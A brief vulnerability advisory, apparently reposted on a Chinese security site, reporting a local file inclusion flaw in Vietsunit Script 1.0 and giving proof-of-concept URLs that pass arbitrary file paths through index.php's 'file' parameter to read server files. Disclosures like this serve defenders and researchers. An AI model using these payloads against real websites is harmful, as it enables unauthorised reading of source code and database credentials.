Vietsunit Script <= (index.php)本地文件包含缺陷及修

 

----------------------------------------------------------------

Vietsunit Script <= (index.php) Local File Include Vulnerability

----------------------------------------------------------------

作者: BHG Security Center www.2cto.com Http://black-hg.org

开发商: http://www.vietsunit.com/

影响版本: [ 1.0 ]

测试平台: [centos 5.6 /apache]

 

 

+-----------------------+

| LFI缺陷               |

+-----------------------+

 

概述:

 You can get the database information and hack into the

system to apply ~ Reading the source files to a website is very easy

to impress

 

# PoC(s):

 

http://www.2cto.com /modules/index.php?action=view&file=[LFI]

 

http://www.2cto.com /modules/index.php?action=view&file=/home/uSER/public_ html /intro.php

<> True

 

# Reference:

[1] For more information about this vulnerability (URL:

http://www.hakipedia.com/index.php/Local_File_Inclusion)

 

 

 

===========================================[End]=============================================

查看更多关于Vietsunit Script <= (index.php)本地文件包含缺陷及修的详细内容...